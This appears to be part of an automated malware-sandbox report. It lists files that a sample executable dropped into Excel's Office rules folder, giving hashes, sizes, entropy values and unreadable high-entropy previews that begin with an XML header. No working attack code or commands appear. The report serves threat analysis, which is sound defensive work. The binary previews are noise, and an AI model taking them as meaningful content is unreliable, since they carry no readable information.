                                                                                                                                                  Preview:<?xml.._.4... .a..N.$.O......'.).._..L.j..P.....J...yO..;..0%.A..DSh7m.r...[E.;.a=..<z^.8r.{...pJ....~..-...C....Y..S..d..n.....\`o0.?[..$.2.;2...B...On..@7....f...7+.{.Z {..y....\.........p..FT.'.v..2............Q.$.q..d..I\V+}M.g..A..B....o.....{FC...p+.`Z[..)A.c....."......./1cu..Q?:)Z.P.#.=...2..m....S.......e$..N|.M..........%..I..p....CJGY<J9w.l"...p.C.&."N.......K....S"D.K8.. .(...q.Q=.0j.>.S^z*T.... O..#.P..B..[.t...|....OeZ... ...*..%...).. ..t~...J.......G.W.{91....=5swMh2...#..P.3#..-...bo..,...."..`..X...u.....[.;*f...W6...o...M...1._...a./.(..-.Z...TBu.A8...O..6.........".H......K;4..0r....:c&..1h..f...)}.......{v.i....)...`j%.QoX.8.7n.X.3.k.r5...2....!I.3Y#c.L...uD.%...i.d.$a.$k...|l.i..5,....?..{].m...D..L...K..M....k.....M.s.T..]...&y....`...@.te-B..p!P.:.@H......k4Q[.d..7:f...l.....>e......P]y,XY....q...4i..S..O...u..h..k...].n..;. difT..Y.LO..N.......+...f^:......L .2........s.....{..6+A......rur..W....WF....1,......x_..s..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11768v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2487
                                                                                                                                                  Entropy (8bit):7.912357424339839
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:BZYe+YCmXCaqN9/QCqHiCyFeEPkCBKQAI7KNQgSIG+CXqp6MraTzbD:BZeJtlNlQpHiyjCMa7mvDp62aTD
                                                                                                                                                  MD5:273C95420B4C1337CBF5525C140A7E60
                                                                                                                                                  SHA1:0FB4E612618BB7C229C38A91A419D2B61E66210F
                                                                                                                                                  SHA-256:0FCCBDF5249488C4B81F1174006B88CF3BD283CF3F660A51A3D19F36426A8B74
                                                                                                                                                  SHA-512:78AC1A20ED10E713E0B043DF9F98E0880F4E6D888606F208582547D3C6A467D51B2470A3695C2FAF5DC283CB1EB388D94C804A83E01D65BF0B9C82A74E5AA38E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlr...w..i..l[...o..}Be...1 ..-K.E`.."G.....mkF.../...n`4Q....U..iX.oi.-.....Fx......6.w...2...z)..k=.4K....p.1.Tu..{...)...D.}..T ..F.TSE...N.[...t.7.z.#P}../p..wL.o..=....TqyZ...z.C..~.q...-JH.[>.h.3..O.~.+'.j0..[.U..m<..IF.....I..B~...I5.8....].M.%*.}.9.,JI.Y:...hi2.d...&x.."b.LK#...]D.......<B. ..;s..t}.c$<.Ar....B....;K1...%....De.....(.'I...'.%..qw.b.V.J......e^iM...x.)..r.pJ3\0..Vf0...V.....v.y.En..lp.1t..G.=.3Z.$.O..O:.$.[.....Z.}.E......m(6B....fL....&}..u.B..#..9...hm.h..v.O.:....z.W0.)^..G....KJ./..p..29...wQZ.%.... ;b....T....2..... .K..;..."....:..k..w.D.D.Duik.y..!.2K..][+Ew.(.`.N..=..s....B|$.....S..<\`r.......H&t!!...-...-mt........\_.%._..n#..<...E.%o^`M..*!..:.*H.q.....+..1u .V.\PLh..8T...\Q.........2w|.........B.x..I.&...l.peNg.+5..DTN.92t4.6....&,.:.qK$...........:5+.g#g+r...8....b....(].x|.h....:...t^`n.C.H....1..j.@P@...,..0.:.w.\.LC.)`....CD.O......N..v!.....w._..o....h ...F'..)..K.b..4.&c.4[ZW...W.)...."....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11769v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3132
                                                                                                                                                  Entropy (8bit):7.943501023793144
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:7N50gAir8AKaY5wmnVAcDTplvVBxbmxNZFZwWq:7N50xIlYemnVXDLjlMNOWq
                                                                                                                                                  MD5:E89330E73417782FBDD1E6342C6E58B9
                                                                                                                                                  SHA1:B2EB7DD6545EDA4C1F80655173DF28820F70BBAE
                                                                                                                                                  SHA-256:F974CE4C633AE07264D048C0E184863AB9098F7F668A345BD265F2C679599F4B
                                                                                                                                                  SHA-512:E77A1C021F862CDC8ACBE3CDD3CEFD4925EBE9391D831245AF67C14BB2579832C59CA2E055C838009E20906B7C585513DD68F328D0816FA0955813E01A1A1727
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlU]........h.4..s1........N.[.s^......g...N..a.}.2..f...|..Ig.4.+>...X..K.$M....o......W."...qZ._.lu.Y.D....pc.6....~.k"..}..,o.Z..F`....?.fL.GA`v......N..g...XMV..%...7.P..kK........b.'P.......h ...]rh.W.$.Q.....P...^.......v..+.E....ym..'..r....YG..<6.[_.~...q..T.](7.*p(aHkXe...O......'..RE;..gx.Sf.v..M.....a. ....!r..:..D..[U...q.^....k.W.......Q.$. ....}.^y.-...>S......+>..$.<.|D..lwI.....1..N%...L.:E.B.....8...a&.......E.....A.......>........z..F\.......+D.5"wTF.F.@&.....w.J.p3.!gRL,..x........X.%....1.%w....[h.... ./.tk..)2.%...2.......L...dD...K.M..cR..m&..A..~.9#4F.d...b.\.$N...zo.[0LM...1.oTe`...?)..U..h..7..D.!..=xkj.......A<c[:..G..d.U..F.......,+.[...3!..=. ......;...n)Q..Ck]z.d..?..w.Q.,B.H.BS..Ly).........P.[...B\.NR.s.J..W.....L..T.k.6S?.A+......l}..E.r...E.!.%r(..~la.e.c..3...{...u.7W.....{.......<....'...R.......p?.....:).?..._.J_...<.....e.r......]+.....P.r....#.El./uHI........?.-......m*.P.@^.K..}...k...vOY...!,..f.d.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11770v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4968
                                                                                                                                                  Entropy (8bit):7.960467511865625
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:hdj5k1jFbu6sEQGrLP9T7lxgnippALvDLgZPNJ42CsfGU6kjmFMC5nnqpujMkHIR:hdj5X6shG/7p6L7MJ7qFMYnAujM2Y
                                                                                                                                                  MD5:67B2B1A60196D3E4DBFDE2EC0CBE5898
                                                                                                                                                  SHA1:98481B4787E253791C59DEF1545A471CDD9A1E0A
                                                                                                                                                  SHA-256:0C6BF1C23DD4122C640374B05C35585889FC4D593F477064CDAF2292CB460FF7
                                                                                                                                                  SHA-512:53DE14D009D66C064E968FB71A061A9AC8EA609D1AF9D3B987EC298FEE91A03301800429A5931E27183C3F6122FA4B6FE967A8C7E37103515F84DC487DAAE00A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml."...<N..R...lpm...K*N....M.PA?...'..*MsHF.......v...'9.+.+B..r.P ..i...XC..gm&.....k...$NG...w...T....x.....{..s$S..D4.u...s.(.H.:&X....t..*a../.1}.......d.P.)...R..=He...........k.1.t..x..0....vb...|...o......?..o............_....d....6Q.]6........Mg,...#......D?.oE.<..5.......^....u....?...#....%"&.b-.2IvO..xo..N...|n1..b..o.].. tA|G.G.O.q/.!0..tCZ.[.*.1....o.kRsC..7t".T^.k...^..&..S../...R...\...y..&c.}.C.P......T:...4........]....Ri....7.Z........:...... %.......]7...}......5..S"=...>.4...x.Ov......).4^..E.....@R4.T...\.....g.)......]..d.....6.m..<......?JY.....m;......g.XH.....n...X......T.G5q...u...\.>s.....O.6.ya..... A...<.\..i..+W..r._..?.?L.M.?`.5.x....l..CsU......P.P..p............-...U.cA.!.....@....j....,../..!..:..cS..Z...E.9[..'".%VK....7.....w.L."n.........h\.R./..5g.dM.;x.O..n..A.......w.].a......&.........d.r..C.8..h>13...*l.AqM..YR..4...!...........\.L...^nt.!HI..4....|......./.{...4..P6.'..>T".....7.f9j].

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11771v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7596
                                                                                                                                                  Entropy (8bit):7.973849834672282
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:t52w0RWZoj4BZkUC1xKZ7QPK7Wj8RqkXKQqnX:t520yj4BZkVv27QPK748A4qX
                                                                                                                                                  MD5:EAF28699706897E14E21DD90B8159B80
                                                                                                                                                  SHA1:711E13732E8EB62732C4024E345335EC656E7286
                                                                                                                                                  SHA-256:E1B794925DDD31E7937492342147F161FD42D5B0D92AA6FD70E01D253D7032C9
                                                                                                                                                  SHA-512:B0F1CBF173F34D6D7148325D8A771FA02D38E6E4AB92AB1C26DCA48FD5E1A275F2D46C3DF81DC14DDFC3304F2121EE37CFA6708878CC7952344948D6E1803C45
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....Y.2=....\(Q.iF...../......L].JV...v..Pk:[..w..}..\}.F..i.....3.u1....w.ZR._........s..$.*V.}..VT.L.....gA.Wk0...3....<V...X.".....Zy'.....jQ.q.l.\.U5...0c..H...Hd..C.....1...,.. ...CI..>....vD.......W...l.$p......."R.......3..|!V.u.N..2*.....z.!.m.;.A..?.7y...w|.RP....|..g...z..C.....U.{...+.'#..*-M......X....g.o'$w...L..k...N}..8.n.4...'iq^E.8.&|.e..HN^....!.8m.K..$.....=0.......:U..:.Z......J_..a.D.)IK_8./.a..*d2.,.\..B.......9.g4b@..?.ey...........7|......U.Ya.....p..z..9;.!a.h`...J.p..Gj7>.M.*.-r&ap.....B....3...x.2b.>.w."t*......o....[...<...%Y.Y.u..8...M. '....E..r....@.Nr...&..)..S2...b/...sH....^.R......|/[Q..0.X I[...s.".v...T.U.Z..k.=8..7.4.Be.E.1...t..D,...n.......dn...?,..p..09i:......b...U...7...r....H7.wr._n...Oz...G..Sl._.j...O.V....;`@../7..n..WH...b..1./.JY.<'..4...jTc..+6d.....:%`:..0Y.^..@....<`n.E..;[VV6....).7.l.cY'...M.sbN.Z.?K.k~.?>..X...v.. i..I...n.b....Oi^..TFo.G...>.4.*X}.6...M.H$K.`..H.....&.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11792v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7356
                                                                                                                                                  Entropy (8bit):7.972903292241591
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZJTB5QZFAhst6ZzGRhdEizYRJhjMAiliR:bQREVId7qNsliR
                                                                                                                                                  MD5:34E0C300A6708993A37A65B4B5DBDE6B
                                                                                                                                                  SHA1:63F8D01B406FC87F9BBC33AEA49194293F6CE45F
                                                                                                                                                  SHA-256:A6A01D828B33048175BEBC2EFD1D145E36E4EE2E6C5E798C88ABDBEAAA998445
                                                                                                                                                  SHA-512:4841158C340FF41478B2D9679CFFB60618819E1CF53EB1730B2DB69A32336F1E1ED4C5A02B1F1A30D4392AC36AC12F3BC6F5231463E4EB507C7830DCB3D871B9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...$...C...idv...8#.D.s .....}.@....[F3...3.9z.c.H.*....;_.t..o.s@....k<.w.._......R..s.v.u......}.Ua#.....j..u........"....G.(-.i0.......m.U..,..X.y..am.G.$.....0y2......I.0.2.AP|v..8....M#H(]..%.;..e..7..G....K.D.b..##...f|fs.6.aD.Q. ..m.b.je...K.C..pX;, 4.|} .....D...........H^HA4[e.<.E........"..s..V S..v..;.K.L.:....{.......g.a.......<"\.y1.2L.w.Cy.Gt.:.H6~J.T.q6...V.D).l......Y...]..1.\......J..Ja.'$.....O....}):]v.[..HC.[.\.y..|;.&...#.....j#...E....5$.+....Z..a{....d3...N.R.h|.J.......oy;n.l..9#.,.IS.O.....9F.m...._-...C......3I.....N$....Za...Bs?x...D..H.m.....lI.....TQ...oH.#"Z.x,.......T`+p..._........y....F.1{._.D.....h...q.K7a[r.,.cr..E....Wh.).z.a3m...~..t.....-XJ0$.9Q.....stAF.W[....NI..`.l.3..X|.*.N....V...US....P..V.{...........A....Y.u..ll....Gr.7...A_Er..M..z..D...6.S5i.zk=....Q..1..8.h..f.w..a2.....'h..\n...i(.......k#..L[...@._...[.F.....i...#Y1../. 0^.c.0[.k.]... .T.4.M..|..X.VQ..u..{Gx....V.<{9g||..@C.T/e....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11793v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1551
                                                                                                                                                  Entropy (8bit):7.894089067203445
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:N7ui4AaqYozGDeMgCnJwWpe3aWIGxmvo9IV9OEzQqrD:NiitlGyMgCnJwF3f74CE7
                                                                                                                                                  MD5:2F564DFC2D1F7F2532EBC8C1103B110A
                                                                                                                                                  SHA1:24560C0C65AE4B608865B59EEF6D5F41560927B7
                                                                                                                                                  SHA-256:7B75367E388A9D7E42B047EA8AE6821A131C5BEEA92CEF52FD4EC8AAA26BD955
                                                                                                                                                  SHA-512:47DD7ED74F033B9774D7378EBC25FAA54361CEE7BDBA3B3C6F2879261FFED7D1A711086B75C2A56F07E4D4275736E9CF154AA2FBBF68449FEC2DC9B95DAD8250
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.y.:..G!.@..>...^.j.o.G.K_.<..._..w.]..Y.r6f&.g....&FDjl.u..7...D........jC.x...W9...Y...+...[....q1a..nf..|Ly.....i.zE...+.9.$.....C.~..0..@Q..I.......v.'......I#...7..;.vs...gcQ2.kq.F....e.{K........X.6p..d....)..2. ... ..f.&.T..1......F..(e.......ky.V...~.+......H.B./;Q..4...Y..k.,G^..T...O.Y.d`..W..U....(...`..........o.o....hLp.@$...S..n]%.v......6;ir.....-.9.Q..M&........~.~...........XW.P2..E.ol.d=..I.&d...B....lo4..c.y.`...).s.Y71..t.Yg.Nt{/w"yk,..kQ.a...m..(.-...\.>.[......E@.j#<a...%^..K.e...}...<.,.d..M..VJ..|..Z...`.".X.v..z..uG...p.W.'....b....X....JIP,.J)r.......xB..[.be.....6L..=2.]..7.<`g7...{.5#n.X."...-.{,.?..[...*7..fK.Yc....\`.<.C3pI.@3.D@....8....c9Yk../oc.q...E...&.`.=..OQI*.u..1..:.QV.0..W.om-.(.....9........U.>~:.O....u...CJ.NV......2....i..iz..a<....t....M8......w....j_.#/..Z......'.......`.H2)r...6&y%.2...{.+h.0.......!L`....q........6..[....e.....4..6....a\...!..B(...s...h4....3-#k...f.|..%. .#BQE{`EIj..4.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11794v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1716
                                                                                                                                                  Entropy (8bit):7.898009956965173
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qrsehPy1GU5Pe0TL7Nco8CFMldCiyPdVWsVMPNQqr/KEWWsoQbqKkzuvY2bD:qJBURh37Dlq0DVWsVaLojoQbkzuvLD
                                                                                                                                                  MD5:7415FEC2C899A570647507922C2F0C31
                                                                                                                                                  SHA1:0398F9E5B769E5D347BC9A50898990BEEA3166C1
                                                                                                                                                  SHA-256:4BAB63FEFAB03996DE3B13587EE1BEAF3FEA934AA4DD3360418AF4E97AEF7FD6
                                                                                                                                                  SHA-512:14BA9F0115380A4FE2A0BAEA0E8A3EBF7701C4C6A11C1638175D31FD53B7037F04A1E429B9A463621C569DA2B2517385BE49EA9A14E819F8F8EAA0288C72CBF7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlWR..........+...qr..6zk...c%....9...X..&Z.......,...T....p-....j*'...Dn...{#..F..Gu....u.Fp....a(.t...K..}q ...H..nW3Y+.h.1.Q%B..MP..|.....<.EX.\@..............S.lIf. {...TN}.......X..c....K._.*.......%<T.cVr..(.{=./..J.....,)....6c2.C........ec.u....$......S.FE.cj/hF .)}.F...5f.$abH4..Z..).....&}...K(.....&...bp.,...o.t18..MML..Os...`...v...i....(t8s...{=.B..!.:.Y._.'...Da!~...O.._.C.^.Q...0.[4..E_.$.AU.....F.......A..z.`.....ofJe.8=..&O.2.l.[9E....$.*qm.}B.E..[.P.l.),P...'..)p.W|...R..."!^.qM.k..t8.....n^....../JJ.^A....[D...hS.....,...j+'...V.z52-...4...PaLI..../.ma<......2n..>.w..u"........n1........^..Y.Qv.s..q...ZY4..:...ag3..D..A..n'o...z..@..Hf.{V...Y...+..j..v1.3...C.9.*R........%.Z...r..........sf..OZtYO......N...:...t....b}...@dz..F...l..6...D......F[..'..5/_:...u9."N..<S...p....5...R.zT.....s......[.......R.yW.\Cz...k..W...g..b8..@...ze...#...C.qx.5...7....wbP.IP..g.l.3...K.e./i^..1.....`.C..D.y:]Y....c..r....L......if....3..8'.).w

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11834v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1737
                                                                                                                                                  Entropy (8bit):7.8830605719879845
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Y7hro5qwVLyhYW5ispM0VdnaLTXGuD5ID:uEdIM0jnaS
                                                                                                                                                  MD5:3B754A822FD80C22C4C5050D38E5315A
                                                                                                                                                  SHA1:314C24FA9790C5303BCA4C7A42573BA836440FBE
                                                                                                                                                  SHA-256:5AE3573DD65406696AD0D316381D2B41F5B3B9B3453125C018201BFE781F338F
                                                                                                                                                  SHA-512:5CE0AC163A368BCE50319299A45E4D2EF9D17432125CC209F465F4180704F3A5ECD68E7069AB5AAEE31ACFF083A2BB45223BE906BF10E4B2E3B9103A790E0567
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.s.5'/...R..'F.F.p....2...bH....b.~.C8.K.u.7.T.....H.Q#.F...j.\.......w../n\V.9..z.7..Q....H..s.......c\+"n.q....E~....~CP'|..p.B..(t.%G.....2....>...oN.?.h...1.&..R..YX.C....r>..5.WqQ.c>.jU....C).. ..#..~.k..J.^...".....Q..:...p....4/.=.8F...~...l.."...5L.k...wn..=Y.....{Tu...-...!.D.S oF..l(....^.v.7$<.....O.&..>.........C.zmw...m;.N...:...Cc.e...*e.f.$.8K...x.......lv.n(...]L....V.3....4...F.0x.=.^..'..J.}..8.6..d.]os..RwH..d'.c..X....m.dV.'.......(..i,<d..~W....Kp..t..}..L.'.|.R|..}'[.g.....D*..Pm....)....c....0...By).....tL.8.s........Q3.=.;...v.jg...]|..#..].5. .......<Z.R.._;....D`X..T..I.s.r6.i..s....8...!...m..~..}....9..S...g`..I........<*.B.5.{.Q...U...Q...b.-L=P....%]..+..U..b...o.P...O.>.^.......#I..9....N..w..cTu.T*..v..s.......c-..l..g.........,1}...9........4.yv".S....=.d.Y...qZV..dRJ...A+X.^]q7.....:.(R....X.4..b.s..&}.D^.)....dE.,.J..A.-.yAP.m..0...m..#..k-..e,d...+.f#8..N.l.8.....q#.......gF*.i..,.m..:...a..NB.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11882v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1448
                                                                                                                                                  Entropy (8bit):7.820560508328112
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:sQpsjt6ruAOxQpCSgHmUr1+wE9fu8MkcRstoXRYjU1dSlzMV21LVyUskbwst2bD:52JSgegGUzE9W7VRPR8UyM4FVyUsOwse
                                                                                                                                                  MD5:AE4329FE90D3D1A7B54F483E8513AD35
                                                                                                                                                  SHA1:3F429591B201A61F5790F03DC546B5D282A7D621
                                                                                                                                                  SHA-256:4C05AC4DA097688CA955300B4CE9385B0D388ACD70B8FC8EB3F3FFE4B45E7018
                                                                                                                                                  SHA-512:331E21B30B9085C7B658CD80E5874C9293CCF8E0B7528F42B07067E8E262A1CD67FE480647FFA5FC46A83F953DBA6935CEC5DCD0B5FB4D4AAF63D16418AC1FC0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml[..\...B..u/..n..).:...L_.......v+.+..Ei..........;..-y..Q7.....F.f}.8.4?~.Hw9u=.....+H....=:Z....K....i....Q.$.m`....R....p..........Pb,6.>=E.p...ry.....1.9...U...M.x.k_.R9}.!.Y...........f..G..B.Y.h..i...cOs...z.+6?Dj>8..W5.6.{b.]...Ec4.\..dk....G.C.b...&..5(j@..@KC..6..<...O.....^......J..&vp.....).m..tX..9..!A.'.7..IT.9.\A.4.... O..c..7.$J...k...D..Oh.i...G..Gx4I...._s....t.^.0..h..me+#....'..Ll;....6.0...'...I.h.... ..0Wy.V....@..H...F....e..j,.m....# ~.Fw.'.....M..Y...E~=s.....).B.l.=...E.J.8..9..8@.">..T.oG'.S".n....U......>x.A..G|K.w.....|...a.AU&k...F..c.w.ZG....-+.tb.hb....T.ID...|hs....o.)...E...[.dE.E...I..XI5.Q~U...8.gJ.....H.....Lx..o.A..P.....wMR.mb..i#.8.Ua;W...\....e..O&.6.dW0.;.........$y.Y..KOf.q.......hH..j.rQ9..t.x.{9?'._..7....h.>}.....=.#-.4&.....xw.K7..E&78.Fx..A......1}........w.:/]1y._..~6[...Lcg...W..>Ws......{He.]A...h..[...e..1P...x...+...(.....X..3Id...n..F..|.f...;...Z.\...;..._.'/..bU^,.E[{WaFm..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11890v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1419
                                                                                                                                                  Entropy (8bit):7.855927742013476
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:HCHS2dJOX+22WV51BRsE6iz6dfmd5pALFG4oRjT0eHH0VB1Ewetow2RN6+OG2R2L:HCS2dJW3/7j3pQfm32pG4+0KUvW5+ONE
                                                                                                                                                  MD5:7F9F8708840F1CC61AC8FE63EE00B044
                                                                                                                                                  SHA1:A2E9851C2E42664B7FE7377B6995ECB94444E63A
                                                                                                                                                  SHA-256:DFABBC039DBDC2572CD6D574CEF0DB57D71D8A87E291EE905C240D1D0BCA0688
                                                                                                                                                  SHA-512:5FCDFA49B458FE69932E2F64F954D338A4E9E93D74A288A2AA36C271847344F4483E077C27EBFAFF4952EF68EB3E9EF5F5509BF5DC5067E5E94F7A508ADA4137
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...}.T.3d...=an..Z....f.n.L..A.../!M.|....v........O..Rv.....'9...Yb!.Z"9|z.H......6eOX...o|)y... ..y\ho}.s.&.7..e..P.S~....k..u&.0v.).k.).jXs...|..H........r...q..uI...,.i...).Kj..M..j..]=.......p...K..Z/.(.......MfT.........g..F..2.2...K^e{....J....D"<.V....fV.0.+...GG.\\b.9.;...`.......0..._u.98.nN...%...j..Y.n..sb.ofzP.0....76W..Z...<)......[.E4.D....z4*.k7N...:..*......".=.XZ.Y.4.._w.TZ.....l?.....0F...Q.J..V_TLK.&j0df.....V89........H^0.Nk[w..lt..sCFi..3s..[...R"b....Q....4:8fb.$M.|..L\..u.3..|C;;-b....D....]..+.Z.g.$rc.P8...~.'6..B.j.......{u>H9?3.#.`o...{.....}...#....i..v.../4.U.mE..[.p...e..._..o.p.m .{.n..~.s.......v...i......,..azLL.;.$^....>.#.W.......%.,70I..gv|..X..Osz....;...q.b.j..qboH...........6..P...j@z.BN8./....e.......ZY.....3'.C..........i7...2.h.}..z..|.;(.'.H.0.."K...W].Th.*.....h]....e.{.-s._EJ..g.R.N.^U/`...,xQ.....@!H.......p.........>O....@..?...T.d..M......,.%B.sOp.....o....Y.]T$b.J.n...c4....|

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11930v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1546
                                                                                                                                                  Entropy (8bit):7.861284393728602
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:rhvwzFEyfte3R5g5IVmp2taV05//8JvuE+y8OMqLRSMPt2QYhz0f11YVlNK/CoA2:rhvOey0Mp2sQwvpwO51xt2ZhkqlsAOD
                                                                                                                                                  MD5:777F6F566DB556EF300EF8B716D84727
                                                                                                                                                  SHA1:14C12064D95AF51B18C221424A95C87593847CDE
                                                                                                                                                  SHA-256:BBACF04EAB53C424985D72EED550DEB92342740E50532842FFAEDAF2BFDA2AE9
                                                                                                                                                  SHA-512:F7E1656BD4DB55C198FF6344F07C44AD498B8A48239AB602342E2073ED9DBAF64E329234B083B3568F03B3D881F6762762CCF50D2E25C7C6E3665F6FDE224564
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..9l|...b.u\.J>....I4.8P.6.l.v...i.DAo....:^.%;.._.X...K..+.$I^.....O..6....e..p%.LO I.9BR...-...t.Y....W..f.X....oUc..0E..|.. ......S.*X.7h..t.....P7.[....5..I.x..,H6`.U.{.......)..`.t.m. ..a.G{.......{1....$..q..Y.~.@.U.-.C....r...h..A.......Kv.{O7+.6..~Ok.RX..9.tJ!.....T.!{0W..;........d-...%...[.@^....1ff.2....R.....|.Vwj.........+]...v.F.+.!RN.p...)t..P-....(J.,....].[;....S....p......~O...7k.%._..r.X.4d0a).5..D*w......H.....F{|^..a.9J..u.Z..KU.tP.{..+.T..V)MgBCN@...V..p...J/p..pc...n.\...H..........e..%.O.).@.#.f.*xJGd.).....i.Q....q;.<.s.:......U..%.j.t#dk@......O..'h.p.I:.5U...r.}..\.F.;..;...1|0.L......F........er.?..........f.....9Y....1..6'....M.[|Ds.pIF.xO3..B^g..V..T.eC../...d.)j.@.5..t2(.ks...Z...P.....C..+......A}..(7...........:=..m...UL..r..qz....^v..-..<..=z*.....:..`..A..........9.,..E>c...+/j.Z...\.?.U...h.&.%.,. R).......djC5......x.....}..B.W...{....v....3...i....r.*......pa|..7.2....Xb..`.DC..o...g@.7.{.....%.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11931v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):903
                                                                                                                                                  Entropy (8bit):7.7773722649232155
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:s4LlTtHMtw7LABviG1Buq5xmYRVjh9qh1zd56v32bD:s4Dstw7LY5VfFup8v0D
                                                                                                                                                  MD5:D75F536721B5818CBB6571BBCC9091FA
                                                                                                                                                  SHA1:3FC0016A30C8CC24BC79AC88FF84900275BAD09A
                                                                                                                                                  SHA-256:3851F9677B8700A22B385ED04E9C8EB85F5581B243CC0EA41AC4F1621AC818E5
                                                                                                                                                  SHA-512:C5434BC99612A1A4615DD62AFE7A83AFA555026EEF743C47BB85B15C4FF4741C3726A4935CBB427AEE190F6153C7ADD7EE256DEA767210C7DD19C19E17D50DC2
                                                                                                                                                  Malicious:false
